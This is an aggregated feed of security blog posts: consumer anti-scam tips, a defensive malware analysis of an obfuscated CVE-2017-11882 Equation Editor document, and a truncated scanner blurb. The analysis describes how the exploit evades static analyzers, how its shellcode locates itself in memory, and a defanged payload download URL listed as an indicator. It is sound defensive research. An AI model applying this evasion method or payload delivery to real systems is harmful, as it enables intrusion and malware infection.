No one is immune to holiday scams. Many scams are intricately designed and executed so that even the savviest consumer is duped. You can enjoy the shopping that comes with the holidays by keeping these few safety precautions in mind. Don’t let your emotional desire for that perfect gift override your reasoning skills. Listen to your intuition when it comes to suspicious websites, offers, emails, pop-up ads, and apps. Pause. Analyze. And make sure you are purchasing from a legitimate site.

Stay safe and WIN: Now that you’ve read about safe shopping basics, head over to our Protect What Matters site. If you successfully complete the Holiday Online Shopping Adventure quiz, you can enter your email address for the chance to win a tech prize pack with some of this season’s hottest smart gadgets. Have fun, and stay safe online this holiday season!

 

The post 8 Ways to Secure Your Family’s Online Holiday Shopping appeared first on McAfee Blogs.

Don’t Get PWNed by Fake Gaming Currency Sites

If you’re a gamer, you know how important virtual currency is. It allows you to purchase new costumes and weapons to personalize your avatar. But how does one go about gaining virtual currency? Players complete in-game challenges and are rewarded with coins to spend in their virtual world. These challenges can be pretty difficult and time-consuming to complete. As a result, many players look to various websites as an easier way to download more gaming currency. Unfortunately, malicious actors are taking advantage of this trend to scam gamers into downloading malware or PUPs (potentially unwanted programs).

There are a variety of techniques scammers use to trick players into utilizing their malicious sites. The first is fake chat rooms. Scammers will set up seemingly legitimate chat rooms where users can post comments or ask questions. What users don’t know is that a bot is actually answering their inquiries automatically. Scammers also ask these victims for “human interaction” by prompting them to enter their personal information via surveys to complete the currency download. What’s more – the message will show a countdown to create a sense of urgency for the user.

These scammers also use additional techniques to make their sites believable, including fake Facebook comments and “live” recent activity updates. The comments and recent activity shown are actually hard-coded into the scam site, giving the appearance that other players are receiving free gaming currency.

These tactics, along with a handful of others, encourage gamers to use the scam sites so cybercriminals can distribute their malicious PUPs or malware. So, with such deceptive sites existing around the internet, the next question is – what can players do to protect themselves from these scammers? Check out the following tips to avoid this cyberthreat:

  • Exercise caution when clicking on links. If a site for virtual currency is asking you to enter your username, password, or financial information, chances are the website is untrustworthy. Remember, when in doubt, always err on the side of caution and avoid giving your information to a site you’re not 100% sure of.
  • Put the chat room to the test. To determine if a chat site is fake, ask the same question a few times. If you notice the same response, it is likely a phony website.
  • Do a Google search of the Facebook comments. An easy way to check if the Facebook comments that appear on a site are legitimate is to copy and paste them into Google. If you see a lot of similar websites come up with the same comments in the description, this is a good indication that it is a scam site.
  • Use security software to surf the web safely. Products like McAfee WebAdvisor can help block gamers from accessing the malicious sites mentioned in this blog.

And, as always, to stay on top of the latest consumer and mobile security threats, be sure to follow me and @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post Don’t Get PWNed by Fake Gaming Currency Sites appeared first on McAfee Blogs.

Evading Static Analyzers by Solving the Equation (Editor)

Introduction

As part of our efforts to self-evaluate our backend systems, we closely monitor the behavioral reports produced by our dynamic analysis system. Every detection is, in fact, cross-checked and correlated with several other pieces of information, including the output from a number of static analyzers.

A few weeks ago a small anomaly started to creep in when analyzing malicious documents: executions spawning a rogue Equation Editor process (often linked to arbitrary code executions) were no longer triggering our internal static analyzers. It was as if the malicious documents were leveraging a new CVE, possibly just added to a well-maintained document exploit builder (for instance like the old Phantom exploit builder kit, or the Metasploit framework).

One of the malicious documents (sha1: cf63479cefc4984309e97ed71e34a078cbf21d6a) was obfuscated but the process snapshot was still clearly showing the exploitation of the same buffer overflow used by CVE-2017-11882. However, the header of the OLE object (as extracted by rtfobj) was clearly different.

Figure 1: Comparison between the OLE header of a document exploiting CVE-2017-11882

Figure 1: Comparison between the OLE header of a document exploiting CVE-2017-11882 and cf63479cefc4984309e97ed71e34a078cbf21d6a.

This quickly explained why the static analyzer didn’t assert detection of the known CVE: any string that is often used to detect CVE-2017-11882 relies on either the class name or some other byte sequence that, as shown in Figure 1, is now clearly missing. At this point, we decided to analyze the document in more detail.

OLE Object Analysis

The OLE object (as extracted by RTFScan and viewed by SS viewer) clearly shows that even its stream type is somewhat generic (normally an Equation Editor OLE object contains an
EquationNative
stream as further explained here). Instead, the OLE stream is parsed as a more obscure  Ole10Native (see Figure 2).

Figure 2: An OLE object featuring an Ole10Native stream.

Figure 2: An OLE object featuring an Ole10Native stream.

There are two interesting things happening here: (i) Equation Editor is still invoked to process the OLE object regardless of the OLE format, and (ii) Equation Editor is able to parse this new and generic format. As we show in Figure 3, the first is achieved because the CLSID is also specified inside the OLE object itself (the reader can find a nice walk through on how this is done here).

Figure 3: OLE includes the CLSID {0002CE02-0000-0000-C000-000000000046} of Equation Editor.

Figure 3: OLE includes the CLSID {0002CE02-0000-0000-C000-000000000046} of Equation Editor.

As for the stream itself, its type is not something we see every day. Equation Editor, on the other hand, seems to know this format quite well, and in fact it parses the object without raising any issue: it selectively reads and tests specific bytes (the first and third byte of the MTEF header and the first two of the TYPESIZE header), and if some specific values are found (as shown in Figure 4), Equation Editor is finally convinced to parse the FONT record as well, triggering once again the same buffer overflow that is normally exploited in CVE-2017-11882.

Figure 4: The layout of the OLE object after reversing the Equation Editor parsing functions. See Table 2 in the Appendix for more details related to the structure of the header.

Figure 4: The layout of the OLE object after reversing the Equation Editor parsing functions. See Table 2 in the Appendix for more details related to the structure of the header.

Shellcode Analysis

The vulnerability exploited to execute the shellcode is indeed CVE-2017-11882; as soon as the FONT record is parsed, the control flow is transferred to 0x445203.

font record

At this address, a RET instruction will be executed to transfer control to the shellcode stored in a buffer located in lieu of the FONT record (this exact method of executing a shellcode is also used by CVE-2017-0802 and further explained here):

Figure 5: Shellcode stored as FONT name inside the FONT record.

Figure 5: Shellcode stored as FONT name inside the FONT record.

The shellcode also is using an interesting way to find itself in memory. Unlike other malicious documents exploiting CVE-2017-11882, in our case, the sample does not rely on the
WinExecute
API to divert execution. Rather, it searches the OLE stream itself to locate the entry point of the shellcode. To succeed, it needs the following three hardcoded values:

  • Address 0x0045BD3C: this address references an object that contains a pointer to another temporary structure (see Table 3 in Appendix for more details). This temporary structure points to the beginning Ole10Native stream as loaded in memory.
  • Address 0x004667B0: this address points to the imported function GlobalLock.
  • 0x11F: the entry point in the shellcode from where it will start executing.

These three values are then used as follows:

  1. First, the shellcode retrieves the handle of the memory object from 0x0045BD3C.
  2. Then the handle so retrieved is passed as parameter and used to invoke the GlobalLock API.
  3. The pointer returned references the first byte of the OLE stream in memory. The shellcode now knows where it is residing in the memory and starts executing from StartOfShellcode+0x11F.

The sample goes on by downloading a file from hxxp://b.reich[.]io/hnepyp.scr, saving it on disk as name.exe, and executing it. In this report, we omit the analysis of this specific binary, as it is yet another pony variant. Were the reader interested, VirusTotal has a full report here (sha1: 2bcd81a9f077ff3500de9a80b469d34a53d51f4a); all IOCs are also listed in the Appendix, Table 1.

Why Static Analysis is not Enough

While in some cases static analysis can detect if a specific vulnerability is exploited, obfuscated samples often present quite a challenge even for the most sophisticated analyzer. In our case, a simple pattern match is not even possible: the only bits of information we can use to write a detection rule is the CLSID and the 5 bytes that are constant in the MathType OLE object (the OLE object used by Equation Editor).

A hypothetical static checker would need to:

  1. Extract the OLE object from the document
  2. Parse the OLE header and check if it is pointing to the Equation Editor CLSID
  3. Extract the Ole10Native stream
  4. Parse it and get the FONT record
  5. Check its actual length
  6. And finally, verify that the last four bytes of the buffer corresponds to an address

This is not a trivial task if done statically, and overall impossible if only pattern matching is available (as it is the case if we are using YARA rules, for example). On the other hand, in Figure 6 we can see the full behavioral analysis when analyzing the sample dynamically.

Figure 6: Analysis overview of the document (sha1: cf63479cefc4984309e97ed71e34a078cbf21d6a).

Figure 6: Analysis overview of the document (sha1: cf63479cefc4984309e97ed71e34a078cbf21d6a).

Conclusions

The sample subject of our analysis did not use any new CVEs, but relied on an unexpected new way to deliver the old and well-known CVE-2017-11882. This particular way of delivering the exploit effectively evaded all static analyzers relying on OLE’s static information. As the exploit author managed to remove (intentionally?) all non-binary strings from the exploit data, he considerably raised the bar for a static analyzer to detect this specific exploit.

Having said that, Microsoft has already issued advisory addressing this specific CVE, so previous mitigations are effective and still apply:

In conclusion, we verified whether MathType v7 (the successor of Equation Editor) was vulnerable to this specific parsing quirk when opening a Ole10Native stream,  but we are glad to report that both mitigations DEP and ASLR are enabled, thereby protecting the binary from the aforementioned vulnerabilities.

Appendix

Indicator Of Compromise Description
cf63479cefc4984309e97ed71e34a078cbf21d6a SHA1 malicious document
2bcd81a9f077ff3500de9a80b469d34a53d51f4a SHA1 loki payload
hxxp://b.reich[.]io/hnepyp.scr URL loki payload

Table 1: IoCs discussed in the blogpost.

Offset Size (bytes) Description Value Comment
0 1 MTEF Version 0x2 Version 2
1 1 Generating Platform 0x8 Garbage
2 1 Generating Product 0x1 1 for Equation Editor
3 1 Product Version 0xB9 Garbage
4 1 Product Subversion 0xC9 Garbage

Table 2: Ole10Native MTEF header.

Offset Size (bytes) Description
0x0 4 Handle to the memory object storing the Ole10Native stream in memory
0x4 4 Size in memory
0x8 4 Size in memory
0x10 4 Index of the byte which will be read next from the stream
0x14 4 Unknown

Table 3: Temporary Structure Format.

The post Evading Static Analyzers by Solving the Equation (Editor) appeared first on Lastline.

Red team Arsenal(RTA) – An intelligent scanner to detect security vulnerability in companies layer 7 assets.

Red Team Arsenal is a web/network security scanner which has the capability to scan all company’s online facing assets and provide an holistic security view...

[[ This is a content summary only. Visit our website for full links, other content, and more! ]]